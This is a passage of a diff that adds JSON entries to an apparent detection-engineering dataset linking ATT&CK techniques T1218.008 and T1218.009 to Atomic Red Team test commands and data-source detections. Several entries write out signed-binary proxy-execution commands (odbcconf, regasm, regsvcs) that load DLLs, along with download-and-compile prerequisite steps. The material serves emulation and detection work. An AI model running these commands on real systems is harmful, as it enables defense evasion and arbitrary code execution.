(e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + null + ] + }, + { + "technique_id": "T1218.008", + "command_list": [ + "odbcconf.exe /S /A {REGSVR \"PathToAtomicsFolder\\T1218.008\\src\\Win32\\T1218-2.dll\"}\n" + ], + "commands": [ + { + "command": "odbcconf.exe /S /A {REGSVR \"PathToAtomicsFolder\\T1218.008\\src\\Win32\\T1218-2.dll\"}\n", + "source": "atomics/T1218.008/T1218.008.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Odbcconf" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1218.008", + "display_name": "Signed Binary Proxy Execution: Odbcconf", + "atomic_tests": [ + { + "name": "Odbcconf.exe - Execute Arbitrary DLL", + "auto_generated_guid": "2430498b-06c0-4b92-a448-8ad263c388e2", + "description": "Execute arbitrary DLL file stored locally.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "dll_payload": { + "description": "DLL to execute", + "type": "Path", + "default": "PathToAtomicsFolder\\T1218.008\\src\\Win32\\T1218-2.dll" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "T1218-2.dll must exist on disk at specified location (#{dll_payload})\n", + "prereq_command": "if (Test-Path #{dll_payload}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/src/Win32/T1218-2.dll\" -OutFile \"#{dll_payload}\"\n" + } + ], + "executor": { + "command": "odbcconf.exe /S /A {REGSVR \"#{dll_payload}\"}\n", + "name": "command_prompt" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1218.009", + "command_list": [ + "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /out:\"%tmp%\\T1218.009.dll\" /target:library #{source_file}\nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U %tmp%\\T1218.009.dll\n", + "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /out:\"#{output_file}\" /target:library PathToAtomicsFolder\\T1218.009\\src\\T1218.009.cs\nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U #{output_file}\n", + "$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='\n$Content = [System.Convert]::FromBase64String($key)\nSet-Content $env:Temp\\key.snk -Value $Content -Encoding Byte\nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /out:\"$Env:TEMP\\T1218.009.dll\" /target:library /keyfile:$env:Temp\\key.snk #{source_file}\nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe $Env:TEMP\\T1218.009.dll\n", + "$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='\n$Content = [System.Convert]::FromBase64String($key)\nSet-Content $env:Temp\\key.snk -Value $Content -Encoding Byte\nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /out:\"#{output_file}\" /target:library /keyfile:$env:Temp\\key.snk PathToAtomicsFolder\\T1218.009\\src\\T1218.009.cs\nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe #{output_file}\n" + ], + "commands": [ + { + "command": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /out:\"%tmp%\\T1218.009.dll\" /target:library #{source_file}\nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U %tmp%\\T1218.009.dll\n", + "source": "atomics/T1218.009/T1218.009.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Regsvcs/Regasm" + }, + { + "command": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /out:\"#{output_file}\" /target:library PathToAtomicsFolder\\T1218.009\\src\\T1218.009.cs\nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U #{output_file}\n", + "source": "atomics/T1218.009/T1218.009.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Regsvcs/Regasm" + }, + { + "command": "$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='\n$Content = [System.Convert]::FromBase64String($key)\nSet-Content $env:Temp\\key.snk -Value $Content -Encoding Byte\nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /out:\"$Env:TEMP\\T1218.009.dll\" /target:library /keyfile:$env:Temp\\key.snk #{source_file}\nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe $Env:TEMP\\T1218.009.dll\n", + "source": "atomics/T1218.009/T1218.009.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Regsvcs/Regasm" + }, + { + "command": "$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='\n$Content = [System.Convert]::FromBase64String($key)\nSet-Content $env:Temp\\key.snk -Value $Content -Encoding Byte\nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /out:\"#{output_file}\" /target:library /keyfile:$env:Temp\\key.snk PathToAtomicsFolder\\T1218.009\\src\\T1218.009.cs\nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe #{output_file}\n", + "source": "atomics/T1218.009/T1218.009.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Regsvcs/Regasm" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1218.009", + "display_name": "Signed Binary Proxy Execution: Regsvcs/Regasm", + "atomic_tests": [ + { + "name": "Regasm Uninstall Method Call Test", + "auto_generated_guid": "71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112", + "description": "Executes the Uninstall Method, No Admin Rights Required. Upon execution, \"I shouldn't really execute either.\" will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "output_file": { + "description": "Location of the payload", + "type": "Path", + "default": "%tmp%\\T1218.009.dll" + }, + "source_file": { + "description": "Location of the CSharp source_file", + "type": "Path", + "default": "PathToAtomicsFolder\\T1218.009\\src\\T1218.009.cs" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "The CSharp source file must exist on disk at specified location (#{source_file})\n", + "prereq_command": "if (Test-Path #{source_file}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.009/src/T1218.009.cs\" -OutFile \"#{source_file}\"\n" + } + ], + "executor": { + "command": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /out:\"#{output_file}\" /target:library #{source_file}\nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U #{output_file}\n", + "cleanup_command": "del #{output_file} >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "Regsvcs Uninstall Method Call Test", + "auto_generated_guid": "fd3c1c6a-02d2-4b72-82d9-71c527abb126", + "description": "Executes the Uninstall Method, No Admin Rights Required, Requires SNK. Upon execution, \"I shouldn't really execute\" will be displayed\nalong with other information about the assembly being installed.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "output_file": { + "description": "Location of the payload", + "type": "Path", + "default": "$Env:TEMP\\T1218.009.dll" + }, + "source_file": { + "description": "Location of the CSharp source_file", + "type": "Path", + "default": "PathToAtomicsFolder\\T1218.009\\src\\T1218.009.cs" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "The CSharp source file must exist on disk at specified location (#{source_file})\n", + "prereq_command": "if (Test-Path #{source_file}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.009/src/T1218.009.cs\" -OutFile \"#{source_file}\"\n" + } + ], + "executor": { + "command": "$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='\n$Content = [System.Convert]::FromBase64String($key)\nSet-Content $env:Temp\\key.snk -Value $Content -Encoding Byte\nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /out:\"#{output_file}\" /target:library /keyfile:$env:Temp\\key.snk #{source_file}\nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe #{output_file}\n", + "cleanup_command": "Remove-Item #{output_file} -ErrorAction Ignore | Out-Null\n$parentpath = Split-Path -Path \"#{output_file}\"\nRemove-Item $parentpath\\key.snk 